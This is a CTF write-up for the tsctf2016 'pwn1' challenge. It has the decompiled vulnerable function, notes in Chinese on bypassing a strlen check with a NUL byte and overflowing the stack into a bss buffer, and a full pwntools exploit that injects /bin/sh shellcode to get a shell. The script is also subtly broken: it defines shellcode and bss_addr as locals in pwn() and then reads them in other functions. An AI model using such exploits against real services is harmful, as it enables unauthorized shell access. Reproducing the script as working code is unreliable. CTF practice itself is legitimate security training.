pwn1
thoughts
int sub_804857D()
{
int v1; // [sp+10h] [bp-20h]@1
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
printf("=====Welcome to tsctf2016!=====\n\nPlease input your name:");
read(0, &unk_804A065, 0x10u);
printf("What do you what to say:");
read(0, &v1, 0x80u);
if ( strlen((const char *)&v1) > 0x1F )
{
puts("you dian CHOU!!!");
exit(0);
}
puts("You are beautiful!");
return 0;
}
- 第一个read处,unk_804A065位于bss段,可以在此处布置asm,利用第二个read处的bof来跳转到此处。
- 在第二个read处,利用\x00来绕过strlen的长度判断。此处,\x00后布置shellcode、覆盖ebp、返回地址。
bof处payload两种写法:
- payload = ‘\x00’ + shellcode +’\x90’*18 +p32(0xdeadbeaf) +p32(bss_addr)
- payload = ‘\x00’ +’\x90’*39 +p32(0xdeadbeaf) + p32(bss_addr) + shellcode
总结
- 看到漏洞,思考此处可以干嘛。如:16个字节的bss段可读可写地址确定。
- IDA中buf的位置是[bp-0x20],但是gdb调试时,buf的位置是ebp-0x28,不知道为啥,感觉IDA有时候反编译的不准确。
exp
from pwn import *
debug = 1
local = 1
attach = local & 0
bps = attach & 1
proc_name = 'pwn1'
#socat TCP4-LISTEN:10001,fork EXEC:./pwn1
ip = '127.0.0.1'
port = 10001
io = None
def makeio():
global io
if local:
io = process(proc_name)
else:
io = remote(ip,port)
def ru(data):
return io.recvuntil(data)
def rv():
return io.recv()
def sl(data):
return io.sendline(data)
def sn(data):
return io.send(data)
def rl():
return io.recvline()
def pwn1():
ru("name:")
# call ebp-0x2f
jmpebp = asm('mov ebp,esp;sub ebp,0x2F;call ebp')
payload = jmpebp.ljust(16,chr(0x90));sn(payload) # sl will send \n
#payload = 16*'\x90';sn(payload) # sl will send \n
ru("say:")
payload = '\x00' + shellcode +'\x90'*18 +p32(0xdeadbeaf) +p32(bss_addr);sn(payload)
print len(payload)
io.interactive()
def pwn2():
ru("name:")
jmpebp = asm('jmp esp')
payload = jmpebp.ljust(16,chr(0x90));sn(payload) # sl will send \n
#payload = 16*'\x90';sn(payload) # sl will send \n
ru("say:")
payload = '\x00' +'\x90'*39 +p32(0xdeadbeaf) + p32(bss_addr) + shellcode;sn(payload)
print len(payload)
io.interactive()
def pwn():
makeio()
if debug:
context.log_level = 'debug'
if attach:
if bps:
gdb.attach(pidof(proc_name)[0], open('bps'))
else:
gdb.attach(pidof(proc_name)[0])
bss_addr = 0x0804A065
shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode += "\x0b\xcd\x80"
pwn2()
if __name__ == '__main__':
pwn()